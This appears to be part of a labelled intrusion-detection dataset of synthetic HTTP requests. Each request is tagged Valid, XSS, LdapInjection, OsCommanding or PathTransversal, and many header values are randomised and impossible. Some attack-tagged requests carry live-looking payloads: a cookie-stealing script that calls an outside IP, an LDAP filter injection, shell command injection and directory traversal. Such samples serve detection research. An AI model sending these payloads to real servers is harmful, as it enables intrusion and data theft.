Transfer-Encoding: gzip
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 579 74.104.76.46 "raice5uopltesn" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40098
Start - Id: 29522
class: Valid
GET /dxRo/mmrsypcNc/aGyxB5Cnb3/l0Sp10/Zmail_G88Fm_krJ/sxj/ftIimWuhkmtnesa/36ww/ses69hodfau6/eVP-6psFIpsi3ned8A/sW6_4epNlMbp6rsvr.png?noelN5ho=neseEpAguwsnspih&Rni=sfVR9&scatd=iexecMcmd%5Cb&rthp=%24unionlje%3Fwp-erg HTTP/1.1
Host: www.T9xds.com
Connection: wumzwh
Accept: text/*, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.4, identity, identity, gzip;q=0.0, gzip
Accept-Language: sr3bSnuS-ti;q=0.7, ase-eme5n, btofo-io;q=0.7, tdgidne-r;q=0.9
Cache-Control: no-store
Client-ip: 2.86.141.83
Cookie: 3En4=]plu;et5s8gte=exe;ZBmdshutdownNfNu_=692397160;dadH=ooo;nf=e5egot
Cookie2: $Version="62"
Date: Tue, 15 Nov 05 01:05:58 GMT
ETag: W/"iAz6haT@eiwQ40q"
Expect: ipszeL=aDh6oo;emsle3mm=r85wbeaa
From: 1ez9dnn@bsgxsssn.gov
If-Modified-Since: Fri, 05 Oct 07 05:39:37 GMT
If-Unmodified-Since: Thu, 06 Aug 09 13:00:39 GMT
If-Match: *
If-None-Match: *
If-Range: "Tkgf3XM46Sp-Mp2Kbuv"
Max-Forwards: 27
MIME-Version: 6.1
Pragma: NtXaTe=oE0
Proxy-Authorization: Basic M2djZXFtOngzaW4=
Authorization: Basic MWNncmg6bG5zc2xzaGU=
Range: 39-
Referer: http://www.anenaet.ch/cure/nsare1u/pIrk1/h5QS5ide.sh
TE: chunked;q=0.8,trailers
Trailer: From
User-Agent: Mozilla/1.4 (compatible; utdtde; Unix; t73e1bprn; tdkCkiin)
UA-CPU: x86
UA-Disp: 4302,407,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 641x2619
Via: 6.1 11.211.122.216
Transfer-Encoding: gzip
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 708 www.enuapiro.htm "tlasiaAtvhw3Eauu" "Tue, 27 Jan 09 20:51:11 UTC"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 734922688511109
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29522
Start - Id: 47137
class: XSS
GET /wenhb0xroM/aehe9heh6loto/GorPWHi0aQ_6Kq6/henilWTq/fNJzb3Z16/lnLyVp.htm?mt0utTsonri5tp=6874695&3ehencfUtone=sQG-.JL_G34&Rkbtiao5s=%3Cimg++src+++%3D%22++++javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F114.47.110.69%2Fie.php4%27%2Bdocument.cookie%29%3B%5D+++%22+%3E HTTP/1.0
Host: www.u3wyesc.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: nrt-u, k-bs0, eGbdiiN-b6nce6
Cache-Control: no-store
Client-ip: 42.224.13.5
Cookie: thaa4vt7t7Olt=G=vb
Cookie2: $Version="732"
Date: Tue, 23 Jun 09 09:42:23 GMT
ETag: W/"dJBPsl2.qb-PYUU"
Expect: 100-continue
From: SntgwR@dDthvRF0b.it
If-Modified-Since: Tue, 07 Dec 04 02:13:31 CET
If-Unmodified-Since: Tue, 28 Apr 09 12:45:48 GMT
If-Match: "pS8f.dNMq2Fa4FO"
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 89
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bndFaWFzZHZhZWFvZmhhbTZhbm9zeE50cjZEaXRiaXRhZW8=
Range: -63707,310050-133
Referer: http://nserc.de/hit0htve/aemwoe.tar
TE: trailers
Trailer: Via
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 4.7; ea-5s; rv:7.4.1) Gecko/59473837
UA-CPU: 68000
UA-Disp: 2636,076,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 673x645
Via: 5.5 201.223.246.78, 4.4 www.e0sar.css
Transfer-Encoding: identity
Upgrade: 8cCE/0.8, oso9/9.4, 3nw/2.9, zDsi/8.2, 6hhwb/7.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47137
Start - Id: 11933
class: Valid
GET /H3A0Q/lIrf0M/oy3Hd/ujformfsZofgevalSaDlogc/0Ooyogahe.js?aYnh2f4cd=5435&dlnHsehAeeotota=8&3Ioyunz=yU1P&eeqmnTtb4cj0c=ai&keO5my1dE=td37z&ejveoabe=6710&e6vn8tynsa29in=nELc&D%uGrmautoexecWTdil=xmlO4hrra&hNM8SvD_9=38521086&os88ee=eolsu&syWoUdhditij=o+rgasG&mtortetoN=tzm4d..eN HTTP/1.1
Host: www.jtih.be:80
Connection: aGtoNd2
Accept: text/xml, text/*, image/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: hsluGhto-jl4n, ywioUe-nbnnoee;q=0.1, ordne-antmI4, oolmdr-rhl7kat, phT-n
Cache-Control: min-fresh=2
Client-ip: 111.206.68.19
Cookie: teerogi=3DBsQPH4l2t;thsoTlos9l=130619
Cookie2: $Version="3"
Date: Sun, 05 Oct 08 11:06:41 CET
ETag: "Z@_jrx68mt-s@PF5"
Expect: 100-continue
From: irNeted@t2hsetDwt.biz
If-Modified-Since: Fri, 08 Apr 05 18:01:43 CET
If-Unmodified-Since: Tue, 24 Aug 04 23:11:03 CET
If-Match: "ec_b_wK0fWxA003gz6gu"
If-None-Match: *
If-Range: "018ovzqwz950IKZ.t.I"
Max-Forwards: 402
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic VGRhdXZFOkNvdG1HYmk=
Authorization: Digest algorithm=8Tberie
Range: 1-,-240,665474-
Referer: http://www.roahEa.gov/Seon/eAsdDcs3.txt
TE: trailers
Trailer: If-Modified-Since
User-Agent: wdmiefm/2.9
UA-CPU: x86
UA-Disp: 4448,340,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: 1.7 239.74.105.15, 1.8 206.160.233.245
Transfer-Encoding: identity
Upgrade: Nnz/1.5, iTsis/1.6
Warning: 588 243.230.142.177 "wa8laofak2j" 
X-Forwarded-For: 237.227.200.204
X-Serial-Number: 7861742222563
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 11933
Start - Id: 13369
class: Valid
GET /mmcijinq1rinsR5are/2Jd36LlPHm3jc_m-/y@BVDHH6yuBfNxYtjIr/Ytrcqes/XSlogZqUiframeGerLD/eVou7ypset4utRfoNyi/a1F41dEXRnE6h2lP8I@d/v4YDM2/sx54J3R11@dq/enst/rpAtD2pheAl/o-QBp99JM.jpeg?ryaq=225 HTTP/1.0
Host: www.sritns.fr
Connection: eioYrps
Accept: application/x-tar;q=0.6, application/*;q=0.2, text/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.4, gzip;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 5rubrOopn4Efn=rMtfea0Wfotth;bavdzsv=790132;dCwcf=8_dR
Cookie2: $Version="97"
Date: Sat, 02 Jan 10 09:29:10 CET
ETag: W/"I7@J5Wh0TJWuj1V"
Expect: Jedxet=msTarIpr
From: iA9ulxl@heitn.fr
If-Modified-Since: Mon, 10 Oct 05 19:16:45 CET
If-Unmodified-Since: Sun, 30 Jan 05 03:49:02 UTC
If-Match: *
If-None-Match: "@QQeJv5_BQ_FMrAeDJo4"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.1
Pragma: isr='aiutmm'
Proxy-Authorization: aaigsv lkaeTa=nvn1feN
Authorization: Basic RmhzZWluOmVlaG1s
Range: -71,274-106
Referer: /iSern/edarn.css
TE: trailers,gzip;q=0.1,gzip;q=0.2
Trailer: Warning
User-Agent: 0thnA6/1.4
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0510x855
Via: 2.9 www.r7qowaql.tiff, HTTP/1.0 www.4xxcece.js, 0.4 www.kata.html
Transfer-Encoding: deflate
Upgrade: sdnNlu/3.0, lm9eS/0.7, 8706/7.7, 5ase/6.3
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 581499383802447
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 13369
Start - Id: 27918
class: Valid
GET /hI0eeIwiso.mdb? HTTP/1.1
Host: 231.40.164.184:3129
Connection: qeow
Accept: */*
Accept-Charset: iso-8859-8;q=0.1, iso-8859-8-i, x-mac-arabic;q=0.8, iso-8859-2;q=0.0, euc-jp
Accept-Encoding: 
Accept-Language: mMe3co-9o3tex, ki7s-zc, 8ntasmn-tokdutov
Cache-Control: max-age=3
Client-ip: 57.198.140.92
Cookie: noeilwnelao= awwinu-aEtrepl3e;ytla=1986024148
Cookie2: $Version="01"
Date: Mon, 31 Mar 08 09:28:07 UTC
ETag: W/"TEv8HF7ZJ__Vznuc"
Expect: oklydA=umoimt
From: ethjhtno@OeeoEam.be
If-Modified-Since: Tue, 09 Sep 08 18:37:17 CET
If-Unmodified-Since: Fri, 17 Aug 07 13:05:06 CET
If-Match: "8vCsfambM9cyuGHtq"
If-None-Match: *
If-Range: Tue, 26 Sep 06 11:24:35 UTC
Max-Forwards: 22
MIME-Version: 1.6
Pragma: srre='sl'
Proxy-Authorization: dtcNb Scowe1=gzontqb
Authorization: NTLM ZW9sbmE0M2NobFNlbnBzaHdpZWJoZXNydWFlbnRXWmh0c09lbmFlb3A0dHdh
Range: -7,3520-,31-
Referer: http://www.rlthf.cz/wknAw/h1oeogb.cgi
TE: chunked;q=0.2,chunked;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: gBSVN.g7. http://www.O7saeXn.uk
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 064x094
Via: FTP/1.2 www.ei7h.html
Transfer-Encoding: rvtmye; abeatw=nwltorui
Upgrade: 2rp/1.4, 9p3l/6.4, s2li/1.7
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 149066712456
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27918
Start - Id: 34951
class: Valid
POST /Lllyol9elotm/hnz@4bI1gu89U/sNm@zc-8mIu_H0VvWTX/hkPcD/he0dgeqhhrNp.css? HTTP/1.0
Content-Length: 251
Content-Language: aeoaT,V
Content-Encoding: deflate
Content-Location: /fH1ner/eol3rG/9iliets/zau8aeA/heSeLrlh.png
Content-MD5: cmF5bmFhMmh5dWRvb2Q4dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jul 05 19:32:00 GMT
Last-Modified: Thu, 18 Oct 07 06:46:15 CET
Host: www.6nfteco.st:732
Connection: arenFlE
Accept: video/quicktime;q=0.6, video/*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip;q=0.3
Accept-Language: adiqs6eu-e, nttur-ati;q=0.1, secwakn5-Egi3A;q=0.8, i-T, tdibs7i-mderp
Cache-Control: no-cache
Client-ip: 157.196.232.187
Cookie: dbewhwD=tnawhereo>tbino21~d;aontstrD=ero
Cookie2: $Version="595"
Date: Wed, 23 May 07 11:16:12 CET
ETag: W/"Evn_Zb@WZ-3-3qZmnmR"
Expect: 2psOlto
From: Jfon@lR0e.de
If-Modified-Since: Sun, 15 Aug 04 23:51:07 CET
If-Unmodified-Since: Sun, 19 Dec 04 09:06:58 GMT
If-Match: "qrk_qqW.WncX_teJ"
If-None-Match: *
If-Range: Sat, 03 Feb 07 12:06:44 GMT
Max-Forwards: 075
MIME-Version: 5.8
Pragma: se='go'
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="csebog"
Range: 26302-,-510,4934-
Referer: http://www.nerfsj.it/nnejcOs/aTxam/qLteac/prlej/tolb.swf
TE: gzip;q=0.2,deflate,trailers
Trailer: Upgrade
User-Agent: teuf2daate (eEbmTS-nM; lkep5Da; 2l7RMgYpH)
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 383x9040
Via: 8.8 www.itrc.tiff:1734, Kue/1.2 www.S5Eto.shtml
Transfer-Encoding: identity
Upgrade: hwo/3.6, TErrh/3.9, hiOn/8.6
Warning: 360 62.80.65.21 "urvcnetdenma" "Tue, 25 Sep 07 21:36:03 CET"
X-Forwarded-For: 230.185.56.242
X-Serial-Number: 755245432377424
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

z9bLxba9prswcex=%nsdtDt&weSgponojar=4ini&hhlatreyljaaaYU=@&terxsaiTa4=93938&8jhsolu=42&fesNolwsaum=xmalrselectnusrd&ee=790550&rd-eeVrPf=2045903&1ri9kqcni0etv=itlsB&SytsnojN=?ib mzt njsuxd5&eS=select7)e&2stEEod=oODoBIIcgmM&x2usohieept=@nde$

End - Id: 34951
Start - Id: 38413
class: LdapInjection
GET /ehesue/si/iL8msJtVfx6U3P/nLs8XProC8ewWc0wq9/c-/k5lU/LYVKX7fromKscriptJS/siutssl2uAipurb/h.JRWWxHHBY6/46IAugqO1.T/oahteeasmHAghySsr.gif?7eE01aemaeeboat=u+o&ozeoes=%29%28++%7C++++%28++cn%3D*o++++%27brien*+++%29%28mail+%3D*o%27brien*%29++&hRjhir3Torno=teZapitrEmS&tarTmt=9605121&otq=6&wuw=9mqiwtyLaft&ihgeo4mdeece=%7Cc19wp-nAnsh&afjm=2lnsE4csock_streamBttmptiq&XNZJnmLe9X2=ae4iframelw+%28a%40meta%3Eio%24 HTTP/1.1
Host: www.nspchxeI.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: ktnrp-a1taN3;q=0.8, oaeuhiIx-boit;q=0.5, hc7r-ts2te, jsmp-enattg
Cache-Control: no-cache
Client-ip: 134.194.27.49
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="17"
Date: Mon, 19 Mar 07 18:35:14 GMT
ETag: "wl@UfNXB1fE.YUPM_nzA"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Sat, 14 Nov 09 02:51:05 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Apr 06 01:20:04 GMT
Max-Forwards: 260
MIME-Version: 0.1
Pragma: itr19ce=rreota
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM YTllYXVzcm96YW9pN29sbkV2blNBb2FlbzNldGlzNGVhc2t4bmU=
Range: -96373
Referer: /sraoom/eNhogoc/oa74av/8rntda.pl
TE: trailers,deflate;q=0.1
Trailer: Max-Forwards
User-Agent: Mozilla/6.9 (X11; U; Open BSD i386 0.3; rt-So; rv:8.1.9) Gecko/36022012
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0696x1408
Via: HTTP/4.0 www.hewE.tiff, 5.9 www.rzdhnxH6.js
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38413
Start - Id: 43341
class: OsCommanding
GET /4fte/eiiisfiees5O7rlune/badp_XV11k4/qandTUneval/Imepuanw.asmx?XpG7R1W=replace&s@group byPHJw=79&siueceni6ekhvcw=%3B+echo++++++++%3B+++++w++++++++%3B++uname+++++-a+++++++++%3B+++++id&8hls=0335&u8S3nE=tGqopPsNilB&nhtHnEshil=46801912&ceNsh=eredhceHtiotupdate&ta=80668&ebmobp3cle6io=1690&gt=e-B46ry&EajioBhhoa9j=aCrnYilr&roxseqnneec9ari=nebcroD&ec=bhobject%3Cxml2++uvUeesogdocumenthhe&oeal6a=3ntpisewaniywRelxs HTTP/1.1
Host: www.znbae.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-roman;q=0.1
Accept-Encoding: identity;q=0.9
Accept-Language: e9e-oonnm;q=0.5, aoehi-ttantttk;q=0.3, do0ck-oeFidi;q=0.6, i-rd, u29cwwho-6aiennc3;q=0.3
Cache-Control: only-if-cached
Client-ip: 39.142.10.38
Cookie: E0aiefsC5txnf=032004;etew8u9E9t4ei=kVR4FBEI;sH=aTc;A5S7g=between/uchildjR;vhf=5231
Cookie2: $Version="76"
Date: Sat, 16 Jan 10 11:24:26 CET
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: "HJ5J1nlZ9dk_1cYV"
If-None-Match: "_clmkQ9TIrz0pU6"
If-Range: *
Max-Forwards: 0144
MIME-Version: 0.2
Pragma: u0can=lu
Proxy-Authorization: Digest nc=0dbF188e
Authorization: NTLM aklzc2FGZVVlZHVhZGphbmhoZXN0bGdlemNlcEtyc2l5ZmVkdGRPZWRFcw==
Range: -3
Referer: http://www.So3ae.net/dsV9ad/5svmradd.nsf
TE: trailers,trailers
Trailer: From
User-Agent: rnyeiebei1are
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 331x628
Via: nqeof/1.9 72.193.110.189:3, FTP/2.1 www.whqo.gif, 2.0 www.amtir5.html
Transfer-Encoding: gzip
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 804 42.58.149.196:9978 "tyrid0" "Sat, 31 Mar 07 01:18:34 UTC"
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 3733669583698502
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43341
Start - Id: 44012
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: www.ylfvltnst.ch:80
Connection: tdu6eene
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, ks_c_5601-1987, utf-8, ks_c_5601-1987, iso-8859-7;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 17.39.141.125
Cookie: oh5l3Sewh=w5eeC9mbmx;t4ucnttat=44670420;thndnsh=Rgi;dtngiSie3ekCsee=aie;imiw=7385380
Cookie2: $Version="1"
Date: Wed, 26 Sep 07 13:13:23 GMT
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 24 Aug 06 14:32:19 GMT
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Sep 05 18:38:04 CET
Max-Forwards: 254
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: /e6bns/0exarsh.php
TE: chunked;q=0.4,gzip;q=0.2,trailers
Trailer: Host
User-Agent: Mozilla/5.7 (X11; U; Unix 6.7; cn-OR; rv:8.0.1) Gecko/93910987
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: teCooo; eage=cepcnecr
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44012
Start - Id: 12425
class: Valid
GET /ewtignHempert6bml3v/e5/eoMkcy/Covlcrdauoreige2rz/pQzqfGXgwnYU9qIM@V/Etahtobmu.htm?e37BHD@4.EO=161&etGsle=Sap HTTP/1.0
Host: 172.216.169.141
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 125.177.91.181
Cookie: epd=556316
Cookie2: $Version="655"
Date: Thu, 26 Mar 09 09:45:51 GMT
ETag: W/"fdvzHVJGleyRZK2"
Expect: 100-continue
From: sesCimt5@ogaheuYna.uk
If-Modified-Since: Fri, 24 Nov 06 08:31:06 GMT
If-Unmodified-Since: Sat, 03 Apr 10 04:09:48 UTC
If-Match: *
If-None-Match: "6IQnMSmTN.RY8jTZ"
If-Range: Tue, 10 Oct 06 13:47:08 GMT
Max-Forwards: 05
MIME-Version: 4.1
Pragma: prE8ni=nbeWvn9A
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: Digest cnonce="6wtnsn"
Range: 5893-55798,532-13883
Referer: http://www.c9daaml.it/7Eweiihr/6sdtl/atoenesn/h3AefS/xaeT.png
TE: deflate;q=0.2,trailers
Trailer: Upgrade
User-Agent: 3laEncoki (ous0cM7S; lehm@n-)
UA-CPU: PowerPC
UA-Disp: 0802,3445,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 357x295
Via: 7.9 182.92.13.10, HTTP/4.7 193.247.167.46
Transfer-Encoding: identity
Upgrade: xmrht/0.2
Warning: 536 15.195.226.94 "faPuNwzo9i" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 200058201
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 12425
Start - Id: 20692
class: Valid
GET /hVl@inputlog_Rx-m4ja/uemen3Sleedo6sx/sihpmegaimozh3yadrm/nGHBp_9Oo23wQWdw-bp0/jcq6iev08z.gif?zteval_Y=i7h&tscdd3cle=b85iniS1.u&7eqsh=464921&Xhze0ueert=432161&nn8scas3tsn=d4iDts&NCUO0CHA=VOe6o%2Fenois%28rl&octt7ia2i6e7=911869949&hymeoddeenhrs=Iestn&5evalR5=726239381&aasD4=o0Ik9E%40xQq&ptell=si8yot+o HTTP/1.1
Host: 83.144.231.243
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-japanese;q=0.1, macintosh, x-mac-japanese, x-mac-arabic;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 195.225.219.90
Cookie: froyv2cce=<h;ootmeet=son k6a%rnpcatyautoexec;jldrrozt=insert ~y7as n;cA-ugk.C=a;scse=ll~i
Cookie2: $Version="37"
Date: Fri, 07 Aug 09 13:48:50 GMT
ETag: "649MQApKJ2VfT94JgRT"
Expect: 100-continue
From: Eenieeb@jtsh.ch
If-Modified-Since: Mon, 08 May 06 11:34:30 GMT
If-Unmodified-Since: Tue, 22 Jan 08 10:10:19 CET
If-Match: "kxi10qL0NSLN7OBTx"
If-None-Match: *
If-Range: Tue, 23 Dec 08 04:25:44 GMT
Max-Forwards: 1
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: NTLM Rm9nZGhxYnpuTHM5dXN0a3VrbXVuYWxvRHpPcmFodGFjNDU=
Range: 17644-3853,-52889
Referer: http://www.qraemO.gov/inSut/zp1ha/cbeo/bUQl.swf
TE: chunked,deflate,chunked;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 8.2; tf-eo; rv:0.0.2) Gecko/19167954
UA-CPU: Sparc
UA-Disp: 8694,520,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 413x553
Via: HTTP/4.1 217.4.100.135, HTTP/1.2 181.239.57.102, HTTP/5.0 www.hmhkee.png
Transfer-Encoding: identity
Upgrade: et7it/4.5, ubres/6.9, ano/2.1, eoeZe/8.3, Rosue/4.4
Warning: 808 224.86.131.197 "arIeIsaddssIt" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20692
Start - Id: 44980
class: PathTransversal
GET /rU3fxLH5XKDzCsG5lK.3/jtw/tgyrxYZv@krIgxjQY/ay.js?asee2=doc%28++++file%3A%2F%2F%2Fc%3A%2Fti%2Fe4ciet.xml%29&xL@N4Ox@Psp=5g%3A%40nrrncsreplaceRuuaevf&e0nbpsinrrwdaro=%25u&q7I9gupH=7336452&Jopr=8275624&tisnS=1&tnbotcOedeRtTa=Oeaern5a4oe&sareapaham8al=97406&thtlo8b=1&5qeeaOq=ou+zzpdpse&mtuounmnthl=etotyee2cee HTTP/1.0
Host: www.buloE9tP.cz
Connection: tdzil
Accept: image/jpeg;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: h-2hDtut, 4h-ehwNr;q=0.7, l-ir, tsr-brtaaNte;q=0.9
Cache-Control: no-store
Client-ip: 64.160.89.221
Cookie: nfse99=72458279;aahY=40atA5hlooO<;ycstoh9gntt=Des;ynt-it.dhZposition=Eruhscuwe4b;tiEranoaeI23=o
Cookie2: $Version="2"
Date: Mon, 13 Nov 06 24:17:40 CET
ETag: "cQYNQi481EW5_Y7"
Expect: wpte
From: ytsw@heeaiueil.de
If-Modified-Since: Wed, 11 Aug 04 02:16:38 CET
If-Unmodified-Since: Mon, 17 Jan 05 15:03:07 GMT
If-Match: "gROhg9XHagzDGrpkSrrw"
If-None-Match: *
If-Range: Thu, 08 Sep 05 12:13:08 UTC
Max-Forwards: 5653
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nhtuo"
Authorization: nrmt eelgn=eieeew
Range: 73-,999598-14093
Referer: /ieex0lwr/Secft/sN7ivasu.nsf
TE: trailers
Trailer: If-Match
User-Agent: 9MHw4yq http://www.eehAntu.fr
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 4.8 www.jmEnbs.css:8, fH5/7.2 226.56.13.183
Transfer-Encoding: gzip
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 02029682111674011013
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44980
Start - Id: 26769
class: Valid
GET /ekhsdgutfvlepTlo9t/aHp0te/iopWgtgwgaTi/ttgU61b3RefikhLk@uA/dRjxWwV-@6aS4Cm05p/o7e5NL4GNTg9/VmetaadminYd/n7jDr4Le-e_mgy2wP3w3/zRXzzBXPCsDy3/adiECurirhszeH/Zg4vSetc.deleteRCS.0.css? HTTP/1.1
Host: www.nmel.st
Connection: close
Accept: */*
Accept-Charset: isiri-3342, cp-950, x-mac-turkish, iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 237.163.228.197
Cookie: xfdaakptsi=shutdown8
Cookie2: $Version="868"
Date: Tue, 24 Feb 09 04:12:16 UTC
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: euklqRgh@mrdmngws.fr
If-Modified-Since: Sun, 17 Dec 06 23:13:32 CET
If-Unmodified-Since: Fri, 28 Dec 07 05:25:43 UTC
If-Match: "o2HGVlKbqOD5oBxjj"
If-None-Match: "RXOfeGKKuYuvuf2C"
If-Range: *
Max-Forwards: 0673
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: sxjt uxsrq=ar1Aoefn
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: /rnphn.swf
TE: trailers
Trailer: From
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 0.5; ra-pB; rv:9.0.4) Gecko/60634666
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: 1.9 122.235.227.250, 3.2 www.NsE9jehe.js, 8.6 www.raeel.png
Transfer-Encoding: identity
Upgrade: oek/3.9
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26769
Start - Id: 18699
class: Valid
